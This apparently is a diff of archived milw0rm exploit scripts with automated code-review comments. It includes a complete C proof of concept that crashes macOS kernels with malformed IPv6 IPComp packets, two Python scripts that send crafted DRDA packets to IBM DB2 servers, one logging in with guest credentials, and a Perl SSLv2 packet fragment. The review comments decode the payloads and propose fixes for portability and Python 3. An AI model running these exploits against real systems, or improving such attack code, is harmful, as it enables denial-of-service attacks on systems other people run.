"\xf5\x61\x1b\xc4\x0b\x34\x1b\x11\x3c\x52\xe9\x93\xd1\xfa\x29\xe9"; "\xf5\x61\x1b\xc4\x0b\x34\x1b\x11\x3c\x52\xe9\x93\xd1\xfa\x29\xe9";
my $ssl_length = pack('n', length($packet_sslv2) + 0x8000); my $ssl_length = pack('n', length($packet_sslv2) + 0x8000);
$packet_sslv2 = $ssl_length . $packet_sslv2; $packet_sslv2 = $ssl_length . $packet_sslv2;
print $new_sock $packet_sslv2; print $new_sock $packet_sslv2;
close($new_sock); close($new_sock);
} }
# milw0rm.com [2007-12-23] # milw0rm.com [2007-12-23]
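Review bot: `$rin` is never populated (no `vec($rin, fileno($new_sock), 1) = 1`), and because `&&` evaluates `select(...)` in scalar context, the `recv` on that line only runs when `select` reports a ready handle, which with an empty bitmask it never does; the statement therefore amounts to a 0.5 s sleep, `$line` is never filled, and `$nfound` is always 0. Either build the bitmask and put `select` and `recv` on separate statements, or drop the line. Also, `my $line;` is declared both at file scope and inside the `while` loop, which `-w` reports as masking an earlier declaration, and `srand(time());` is dead since nothing calls `rand`.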


@ -1,143 +1,143 @@
/* xnu-ipv6-ipcomp.c /* xnu-ipv6-ipcomp.c
* *
* Copyright (c) 2008 by <mu-b@digit-labs.org> * Copyright (c) 2008 by <mu-b@digit-labs.org>
* *
* Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS POC * Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS POC
* by mu-b - Sun 24 Feb 2008 * by mu-b - Sun 24 Feb 2008
* *
* - Tested on: Apple MACOS X 10.5.1 (xnu-1228.0.2~1/RELEASE_I386) * - Tested on: Apple MACOS X 10.5.1 (xnu-1228.0.2~1/RELEASE_I386)
* Apple MACOS X 10.5.2 (xnu-1228.3.13~1/RELEASE_I386) * Apple MACOS X 10.5.2 (xnu-1228.3.13~1/RELEASE_I386)
* *
* ipcomp6_input does not verify the success of the first call * ipcomp6_input does not verify the success of the first call
* to m_pulldown (m -> md typo?). * to m_pulldown (m -> md typo?).
* *
* md = m_pulldown(m, off, sizeof(*ipcomp), NULL); * md = m_pulldown(m, off, sizeof(*ipcomp), NULL);
* if (!m) { * if (!m) {
* -> * ->
* md = m_pulldown(m, off, sizeof(*ipcomp), NULL); * md = m_pulldown(m, off, sizeof(*ipcomp), NULL);
* if (!md) { * if (!md) {
* (bsd/netinet6/ipcomp_input.c) * (bsd/netinet6/ipcomp_input.c)
* *
* curiosly the same bug exists in ipcomp4_input, but an explicit * curiosly the same bug exists in ipcomp4_input, but an explicit
* check is made to ensure there is enough space for the struct ipcomp. * check is made to ensure there is enough space for the struct ipcomp.
* *
* Note: bug independently found by Shoichi Sakane of the KAME project. * Note: bug independently found by Shoichi Sakane of the KAME project.
* (FreeBSD 5.5, 4.9.0 & NetBSD 3.1 also vulnerable) * (FreeBSD 5.5, 4.9.0 & NetBSD 3.1 also vulnerable)
* (http://www.kb.cert.org/vuls/id/110947) * (http://www.kb.cert.org/vuls/id/110947)
* (http://www.securityfocus.com/bid/27642) * (http://www.securityfocus.com/bid/27642)
* (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0177) * (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0177)
* *
* - Private Source Code -DO NOT DISTRIBUTE - * - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$! * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/ */
#include <stdio.h> #include <stdio.h>
#include <stdlib.h> #include <stdlib.h>
#include <arpa/inet.h> #include <arpa/inet.h>
#include <ifaddrs.h> #include <ifaddrs.h>
#include <libnet.h> #include <libnet.h>
#include <string.h> #include <string.h>
#include <sys/types.h> #include <sys/types.h>
#include <sys/socket.h> #include <sys/socket.h>
#include <unistd.h> #include <unistd.h>
#define IPV6_INTERFACE "eth0" #define IPV6_INTERFACE "eth0"
#define IPV6_SRC_OFFSET 8 #define IPV6_SRC_OFFSET 8
#define IPV6_DST_OFFSET 24 #define IPV6_DST_OFFSET 24
#define HAMMER_NUM 8 #define HAMMER_NUM 8
static unsigned char pbuf[] = static unsigned char pbuf[] =
"\x60" "\x60"
"\x00\x00\x00" "\x00\x00\x00"
"\x00\x00" /* plen = 0 */ "\x00\x00" /* plen = 0 */
"\x6c" /* nxt_hdr = IPComp */ "\x6c" /* nxt_hdr = IPComp */
"\x66" "\x66"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
static int static int
get_localip (char *if_name, unsigned int *ip6_addr) get_localip (char *if_name, unsigned int *ip6_addr)
{ {
struct ifaddrs *ifa_head; struct ifaddrs *ifa_head;
int result; int result;
result = -1; result = -1;
if (getifaddrs (&ifa_head) == 0) if (getifaddrs (&ifa_head) == 0)
{ {
struct ifaddrs *ifa_cur; struct ifaddrs *ifa_cur;
ifa_cur = ifa_head; ifa_cur = ifa_head;
for (ifa_cur = ifa_head; ifa_cur; ifa_cur = ifa_cur->ifa_next) for (ifa_cur = ifa_head; ifa_cur; ifa_cur = ifa_cur->ifa_next)
{ {
if (ifa_cur->ifa_name != NULL && ifa_cur->ifa_addr != NULL) if (ifa_cur->ifa_name != NULL && ifa_cur->ifa_addr != NULL)
{ {
if (strcmp (if_name, (char *) ifa_cur->ifa_name) != 0 || if (strcmp (if_name, (char *) ifa_cur->ifa_name) != 0 ||
ifa_cur->ifa_addr->sa_family != AF_INET6 || ifa_cur->ifa_addr->sa_family != AF_INET6 ||
!(ifa_cur->ifa_flags & IFF_UP)) !(ifa_cur->ifa_flags & IFF_UP))
continue; continue;
memcpy (ip6_addr, memcpy (ip6_addr,
&(((struct sockaddr_in6 *) ifa_cur->ifa_addr)->sin6_addr), &(((struct sockaddr_in6 *) ifa_cur->ifa_addr)->sin6_addr),
sizeof (int) * 4); sizeof (int) * 4);
result = 0; result = 0;
break; break;
} }
} }
freeifaddrs (ifa_head); freeifaddrs (ifa_head);
} }
return (result); return (result);
} }
int int
main (int argc, char **argv) main (int argc, char **argv)
{ {
char errbuf[LIBNET_ERRBUF_SIZE], ip6_buf[128]; char errbuf[LIBNET_ERRBUF_SIZE], ip6_buf[128];
unsigned int i, ip6_addr[4]; unsigned int i, ip6_addr[4];
libnet_t *lnsock; libnet_t *lnsock;
printf ("Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS PoC\n" printf ("Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS PoC\n"
"by: <mu-b@digit-labs.org>\n" "by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc < 2) if (argc < 2)
{ {
fprintf (stderr, "Usage: %s <dst ipv6>\n", argv[0]); fprintf (stderr, "Usage: %s <dst ipv6>\n", argv[0]);
exit (EXIT_FAILURE); exit (EXIT_FAILURE);
} }
if (get_localip (IPV6_INTERFACE, if (get_localip (IPV6_INTERFACE,
(unsigned int *) &pbuf[IPV6_SRC_OFFSET]) < 0) (unsigned int *) &pbuf[IPV6_SRC_OFFSET]) < 0)
{ {
fprintf (stderr, "* get_localip() failed\n"); fprintf (stderr, "* get_localip() failed\n");
exit (EXIT_FAILURE); exit (EXIT_FAILURE);
} }
if (inet_pton (AF_INET6, argv[1], ip6_addr) <= 0) if (inet_pton (AF_INET6, argv[1], ip6_addr) <= 0)
{ {
fprintf (stderr, "* inet_pton() failed\n"); fprintf (stderr, "* inet_pton() failed\n");
exit (EXIT_FAILURE); exit (EXIT_FAILURE);
} }
memcpy (&pbuf[IPV6_DST_OFFSET], ip6_addr, sizeof ip6_addr); memcpy (&pbuf[IPV6_DST_OFFSET], ip6_addr, sizeof ip6_addr);
lnsock = libnet_init (LIBNET_RAW6_ADV, NULL, errbuf); lnsock = libnet_init (LIBNET_RAW6_ADV, NULL, errbuf);
if (lnsock == NULL) if (lnsock == NULL)
{ {
fprintf (stderr, "* libnet_init() failed: %s\n", errbuf); fprintf (stderr, "* libnet_init() failed: %s\n", errbuf);
exit (EXIT_FAILURE); exit (EXIT_FAILURE);
} }
inet_ntop (AF_INET6, &pbuf[IPV6_SRC_OFFSET], ip6_buf, sizeof ip6_buf); inet_ntop (AF_INET6, &pbuf[IPV6_SRC_OFFSET], ip6_buf, sizeof ip6_buf);
printf ("* local ipv6 %s...\n", ip6_buf); printf ("* local ipv6 %s...\n", ip6_buf);
printf ("* attacking %s...", argv[1]); printf ("* attacking %s...", argv[1]);
for (i = 0; i < HAMMER_NUM; i++) for (i = 0; i < HAMMER_NUM; i++)
libnet_write_raw_ipv6 (lnsock, pbuf, sizeof pbuf - 1); libnet_write_raw_ipv6 (lnsock, pbuf, sizeof pbuf - 1);
printf ("done\n"); printf ("done\n");
return (EXIT_SUCCESS); return (EXIT_SUCCESS);
} }
// milw0rm.com [2008-02-26] // milw0rm.com [2008-02-26]
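Review bot: `get_localip` copies `sizeof (int) * 4` bytes into `ip6_addr`, which equals an IPv6 address only where `int` is 32 bits; `sizeof (struct in6_addr)` states the intent and holds on any platform, and the parameter would read better typed as `struct in6_addr *` than `unsigned int *`. Smaller points: `ifa_cur = ifa_head;` before the `for` is redundant because the loop initialiser sets it, `IFF_UP` comes from `<net/if.h>`, which is not included directly and only reaches this file through `libnet.h`, and `IPV6_INTERFACE "eth0"` is hard-coded rather than taken from `argv`. The header still says `Private Source Code -DO NOT DISTRIBUTE`, which no longer matches a file in a public archive.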


@ -1,33 +1,33 @@
# Discovered by Dennis Yurichev <dennis@conus.info> # Discovered by Dennis Yurichev <dennis@conus.info>
# DB2TEST database should be present on target system # DB2TEST database should be present on target system
from sys import * from sys import *
from socket import * from socket import *
sockobj = socket(AF_INET, SOCK_STREAM) sockobj = socket(AF_INET, SOCK_STREAM)
sockobj.connect ((argv[1], 50000)) sockobj.connect ((argv[1], 50000))
sockobj.send( sockobj.send(
"\x00\xBE\xD0\x41\x00\x01\x00\xB8\x10\x41\x00\x7F\x11\x5E\x97\xA8" "\x00\xBE\xD0\x41\x00\x01\x00\xB8\x10\x41\x00\x7F\x11\x5E\x97\xA8"
"\xA3\x88\x96\x95\x4B\x85\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40" "\xA3\x88\x96\x95\x4B\x85\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\xF0\xF1\xC3\xF4\xF0\xF1\xF1\xF8\xF0\xF0\xF0\x00\x00\x00" "\x40\x40\xF0\xF1\xC3\xF4\xF0\xF1\xF1\xF8\xF0\xF0\xF0\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\xF0\xF0" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\xF0\xF0"
"\xF0\xF1\xD5\xC1\xD4\xC5\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" "\xF0\xF1\xD5\xC1\xD4\xC5\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\xF0\xC4\xC2\xF2\x40\x40\x40\x40" "\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\xF0\xC4\xC2\xF2\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x18\x14\x04\x14\x03\x00" "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x18\x14\x04\x14\x03\x00"
"\x07\x24\x07\x00\x09\x14\x74\x00\x05\x24\x0F\x00\x08\x14\x40\x00" "\x07\x24\x07\x00\x09\x14\x74\x00\x05\x24\x0F\x00\x08\x14\x40\x00"
"\x08\x00\x0B\x11\x47\xD8\xC4\xC2\xF2\x61\xD5\xE3\x00\x06\x11\x6D" "\x08\x00\x0B\x11\x47\xD8\xC4\xC2\xF2\x61\xD5\xE3\x00\x06\x11\x6D"
"\xE7\xD7\x00\x0C\x11\x5A\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0\x00\x4A" "\xE7\xD7\x00\x0C\x11\x5A\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0\x00\x4A"
"\xD0\x01\x00\x02\x00\x44\x10\x6E\x00\x06\x11\xA2\x00\x09\x00\x16" "\xD0\x01\x00\x02\x00\x44\x10\x6E\x00\x06\x11\xA2\x00\x09\x00\x16"
"\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40" "\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x00\x24\x11\xDC\x6F\xC1\x3B\xD4\x3C\x33\xF8\x0C" "\x40\x40\x40\x40\x00\x24\x11\xDC\x6F\xC1\x3B\xD4\x3C\x33\xF8\x0C"
"\xC9\x96\x6E\x6C\xCD\xB9\x0A\x2C\x9C\xEC\x49\x2A\x1A\x4D\xCE\x62" "\xC9\x96\x6E\x6C\xCD\xB9\x0A\x2C\x9C\xEC\x49\x2A\x1A\x4D\xCE\x62"
"\x47\x9D\x37\x88\xA8\x77\x23\x43") "\x47\x9D\x37\x88\xA8\x77\x23\x43")
sockobj.close() sockobj.close()
# milw0rm.com [2009-04-03] # milw0rm.com [2009-04-03]
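Review bot: the payload is an undocumented blob; a comment naming the DRDA structure it carries would let maintainers and signature writers see what is being sent without decoding it by hand (for example, the EBCDIC `DB2TEST` database name, `\xC4\xC2\xF2\xE3\xC5\xE2\xE3`, matches the prerequisite stated in the header). Also `from sys import *` and `from socket import *` pull every name into the module namespace where a plain `import` would do, `argv[1]` is used without a usage check, and the `"\x.."` literals are Python 2 byte strings that become text under Python 3 and would need a `b` prefix to be passed to `send`.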


@ -1,90 +1,90 @@
# Discovered by Dennis Yurichev <dennis@conus.info> # Discovered by Dennis Yurichev <dennis@conus.info>
# DB2TEST database should be present on target system # DB2TEST database should be present on target system
# GUEST account with QQ password shoule be present on target system # GUEST account with QQ password shoule be present on target system
from sys import * from sys import *
from socket import * from socket import *
sockobj = socket(AF_INET, SOCK_STREAM) sockobj = socket(AF_INET, SOCK_STREAM)
sockobj.connect ((argv[1], 50000)) sockobj.connect ((argv[1], 50000))
sockobj.send( sockobj.send(
"\x00\xBE\xD0\x41\x00\x01\x00\xB8\x10\x41\x00\x7F\x11\x5E\x97\xA8" "\x00\xBE\xD0\x41\x00\x01\x00\xB8\x10\x41\x00\x7F\x11\x5E\x97\xA8"
"\xA3\x88\x96\x95\x4B\x85\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40" "\xA3\x88\x96\x95\x4B\x85\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\xF0\xF1\xC2\xF4\xF0\xF3\xC2\xF8\xF0\xF0\xF0\x00\x00\x00" "\x40\x40\xF0\xF1\xC2\xF4\xF0\xF3\xC2\xF8\xF0\xF0\xF0\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\xF0\xF0" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\xF0\xF0"
"\xF0\xF1\xD5\xC1\xD4\xC5\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" "\xF0\xF1\xD5\xC1\xD4\xC5\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\xF0\xC4\xC2\xF2\x40\x40\x40\x40" "\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\xF0\xC4\xC2\xF2\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x18\x14\x04\x14\x03\x00" "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x18\x14\x04\x14\x03\x00"
"\x07\x24\x07\x00\x09\x14\x74\x00\x05\x24\x0F\x00\x08\x14\x40\x00" "\x07\x24\x07\x00\x09\x14\x74\x00\x05\x24\x0F\x00\x08\x14\x40\x00"
"\x08\x00\x0B\x11\x47\xD8\xC4\xC2\xF2\x61\xD5\xE3\x00\x06\x11\x6D" "\x08\x00\x0B\x11\x47\xD8\xC4\xC2\xF2\x61\xD5\xE3\x00\x06\x11\x6D"
"\xE7\xD7\x00\x0C\x11\x5A\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0\x00\x4A" "\xE7\xD7\x00\x0C\x11\x5A\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0\x00\x4A"
"\xD0\x01\x00\x02\x00\x44\x10\x6D\x00\x06\x11\xA2\x00\x09\x00\x16" "\xD0\x01\x00\x02\x00\x44\x10\x6D\x00\x06\x11\xA2\x00\x09\x00\x16"
"\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40" "\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x00\x24\x11\xDC\x71\x71\x99\xA7\xDF\xD5\x8F\x18" "\x40\x40\x40\x40\x00\x24\x11\xDC\x71\x71\x99\xA7\xDF\xD5\x8F\x18"
"\x45\x96\xD6\x07\x08\x8D\xDC\x60\x4F\xFA\xE6\x37\x4D\x6A\x62\xAB" "\x45\x96\xD6\x07\x08\x8D\xDC\x60\x4F\xFA\xE6\x37\x4D\x6A\x62\xAB"
"\x0C\xE1\x00\xAB\xA3\xD5\x32\x3E" "\x0C\xE1\x00\xAB\xA3\xD5\x32\x3E"
) )
data=sockobj.recv(102400) data=sockobj.recv(102400)
sockobj.send( sockobj.send(
"\x00\x26\xD0\x41\x00\x01\x00\x20\x10\x6D\x00\x06\x11\xA2\x00\x03" "\x00\x26\xD0\x41\x00\x01\x00\x20\x10\x6D\x00\x06\x11\xA2\x00\x03"
"\x00\x16\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40" "\x00\x16\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x00\x35\xD0\x41\x00\x02\x00\x2F\x10\x6E" "\x40\x40\x40\x40\x40\x40\x00\x35\xD0\x41\x00\x02\x00\x2F\x10\x6E"
"\x00\x06\x11\xA2\x00\x03\x00\x16\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2" "\x00\x06\x11\xA2\x00\x03\x00\x16\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2"
"\xE3\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x06\x11\xA1" "\xE3\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x06\x11\xA1"
"\x98\x98\x00\x09\x11\xA0\x87\xA4\x85\xA2\xA3\x00\xBF\xD0\x01\x00" "\x98\x98\x00\x09\x11\xA0\x87\xA4\x85\xA2\xA3\x00\xBF\xD0\x01\x00"
"\x03\x00\xB9\x20\x01\x00\x06\x21\x0F\x24\x07\x00\x23\x21\x35\xF1" "\x03\x00\xB9\x20\x01\x00\x06\x21\x0F\x24\x07\x00\x23\x21\x35\xF1"
"\xF9\xF2\x4B\xF1\xF6\xF8\x4B\xF0\x4B\xF1\xF0\xF8\x4B\xF3\xF5\xF3" "\xF9\xF2\x4B\xF1\xF6\xF8\x4B\xF0\x4B\xF1\xF0\xF8\x4B\xF3\xF5\xF3"
"\xF3\xF3\x4B\xF0\xF8\xF1\xF0\xF2\xF3\xF1\xF6\xF0\xF8\xF1\x00\x16" "\xF3\xF3\x4B\xF0\xF8\xF1\xF0\xF2\xF3\xF1\xF6\xF0\xF8\xF1\x00\x16"
"\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40" "\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x00\x0C\x11\x2E\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0" "\x40\x40\x40\x40\x00\x0C\x11\x2E\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0"
"\x00\x0D\x00\x2F\xD8\xE3\xC4\xE2\xD8\xD3\xE7\xF8\xF6\x00\x1C\x00" "\x00\x0D\x00\x2F\xD8\xE3\xC4\xE2\xD8\xD3\xE7\xF8\xF6\x00\x1C\x00"
"\x35\x00\x06\x11\x9C\x04\xE4\x00\x06\x11\x9D\x04\xB0\x00\x06\x11" "\x35\x00\x06\x11\x9C\x04\xE4\x00\x06\x11\x9D\x04\xB0\x00\x06\x11"
"\x9E\x04\xE4\x00\x06\x19\x13\x04\xB8\x00\x3C\x21\x04\x37\xE2\xD8" "\x9E\x04\xE4\x00\x06\x19\x13\x04\xB8\x00\x3C\x21\x04\x37\xE2\xD8"
"\xD3\xF0\xF9\xF0\xF5\xF0\xD5\xE3\x40\x40\x40\x40\x40\x40\x40\x40" "\xD3\xF0\xF9\xF0\xF5\xF0\xD5\xE3\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x97\xA8\xA3\x88\x96\x95\x4B\x85" "\x40\x40\x40\x40\x40\x40\x40\x40\x97\xA8\xA3\x88\x96\x95\x4B\x85"
"\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x87\xA4\x85\xA2" "\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x87\xA4\x85\xA2"
"\xA3\x40\x40\x40\x00\x00\x05\x21\x3B\xF1" "\xA3\x40\x40\x40\x00\x00\x05\x21\x3B\xF1"
) )
data=sockobj.recv(102400) data=sockobj.recv(102400)
sockobj.send( sockobj.send(
"\x00\x12\xD0\x41\x00\x01\x00\x0C\x10\x41\x00\x08\x14\x04\x14\xCC" "\x00\x12\xD0\x41\x00\x01\x00\x0C\x10\x41\x00\x08\x14\x04\x14\xCC"
"\x04\xE4\x00\x4E\xD0\x51\x00\x02\x00\x48\x20\x14\x00\x44\x21\x13" "\x04\xE4\x00\x4E\xD0\x51\x00\x02\x00\x48\x20\x14\x00\x44\x21\x13"
"\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20\x20\x20\x20" "\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x01\x01\x01\x01\x01\x01\x01\x01\x00\x01" "\x20\x20\x20\x20\x20\x20\x01\x01\x01\x01\x01\x01\x01\x01\x00\x01"
"\x00\x35\xD0\x74\x00\x02\x00\x2F\x24\x14\x00\x00\x00\x00\x25\x53" "\x00\x35\xD0\x74\x00\x02\x00\x2F\x24\x14\x00\x00\x00\x00\x25\x53"
"\x45\x54\x20\x43\x55\x52\x52\x45\x4E\x54\x20\x4C\x4F\x43\x41\x4C" "\x45\x54\x20\x43\x55\x52\x52\x45\x4E\x54\x20\x4C\x4F\x43\x41\x4C"
"\x45\x20\x4C\x43\x5F\x43\x54\x59\x50\x45\x20\x3D\x20\x27\x65\x6E" "\x45\x20\x4C\x43\x5F\x43\x54\x59\x50\x45\x20\x3D\x20\x27\x65\x6E"
"\x5F\x55\x53\x27\xFF\x00\x53\xD0\x51\x00\x03\x00\x4D\x20\x0D\x00" "\x5F\x55\x53\x27\xFF\x00\x53\xD0\x51\x00\x03\x00\x4D\x20\x0D\x00"
"\x44\x21\x13\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20" "\x44\x21\x13\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20" "\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x4C\x56\x4C\x30" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x4C\x56\x4C\x30"
"\x31\x00\x04\x00\x05\x21\x16\xF1\x00\x1A\xD0\x53\x00\x03\x00\x14" "\x31\x00\x04\x00\x05\x21\x16\xF1\x00\x1A\xD0\x53\x00\x03\x00\x14"
"\x24\x50\x00\x00\x00\x00\x0A\x57\x49\x54\x48\x20\x48\x4F\x4C\x44" "\x24\x50\x00\x00\x00\x00\x0A\x57\x49\x54\x48\x20\x48\x4F\x4C\x44"
"\x20\xFF\x00\x41\xD0\x43\x00\x03\x00\x3B\x24\x14\x00\x00\x00\x00" "\x20\xFF\x00\x41\xD0\x43\x00\x03\x00\x3B\x24\x14\x00\x00\x00\x00"
"\x31\x73\x65\x6C\x65\x63\x74\x20\x2A\x20\x46\x52\x4F\x4D\x20\x54" "\x31\x73\x65\x6C\x65\x63\x74\x20\x2A\x20\x46\x52\x4F\x4D\x20\x54"
"\x41\x42\x4C\x45\x20\x28\x73\x79\x73\x70\x72\x6F\x63\x2E\x65\x6E" "\x41\x42\x4C\x45\x20\x28\x73\x79\x73\x70\x72\x6F\x63\x2E\x65\x6E"
"\x76\x5F\x67\x65\x74\x5F\x69\x6E\x73\x74\x5F\x69\x6E\x66\x6F\x28" "\x76\x5F\x67\x65\x74\x5F\x69\x6E\x73\x74\x5F\x69\x6E\x66\x6F\x28"
"\x29\x29\xFF\x00\x66\xD0\x01\x00\x04\x00\x60\x20\x0C\x00\x44\x21" "\x29\x29\xFF\x00\x66\xD0\x01\x00\x04\x00\x60\x20\x0C\x00\x44\x21"
"\x13\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20\x20\x20" "\x13\x44\x42\x32\x54\x45\x53\x54\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x4E\x55\x4C\x4C\x49\x44\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20\x20\x20" "\x20\x20\x20\x20\x20\x53\x59\x53\x53\x48\x32\x30\x30\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x4C\x56\x4C\x30\x31\x00" "\x20\x20\x20\x20\x20\x20\x20\x53\x59\x53\x4C\x56\x4C\x30\x31\x00"
"\x04\x00\x08\x21\x14\x00\x00\x7F\xFF\x00\x06\x21\x41\xFF\xFF\x00" "\x04\x00\x08\x21\x14\x00\x00\x7F\xFF\x00\x06\x21\x41\xFF\xFF\x00"
"\x05\x21\x5D\x01\x00\x05\x21\x4B\xF1" "\x05\x21\x5D\x01\x00\x05\x21\x4B\xF1"
) )
sockobj.close() sockobj.close()
# milw0rm.com [2009-04-03] # milw0rm.com [2009-04-03]
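Review bot: the header should state what the three packets contain, since it is recoverable from the bytes but never written down: the second packet carries the `guest`/`qq` credentials from the header in EBCDIC (`\x87\xA4\x85\xA2\xA3` and `\x98\x98`), and the third carries ASCII SQL, `SET CURRENT LOCALE LC_CTYPE = 'en_US'`, `WITH HOLD` and `select * FROM TABLE (sysproc.env_get_inst_info())`, so the statement being exercised is only visible by decoding the bytes. The two `data=sockobj.recv(102400)` results are never examined, so a failed handshake or authentication goes unnoticed and the final packet is sent regardless. The first packet also repeats the previous script's almost byte for byte, differing only in a few bytes of the third line and in `\x10\x6D` versus `\x10\x6E`; the shared preamble could be factored into one module.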


@ -455,6 +455,6 @@ main(int argc, char **argv)
#endif #endif
return 0; return 0;
} }
// milw0rm.com [2005-04-20] // milw0rm.com [2005-04-20]


@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/23987/info
Multiple personal firewall products are prone to a vulnerability that lets attackers bypass protection mechanisms. This issue occurs because the applications fail to properly implement protection mechanisms based on valid process identifiers.
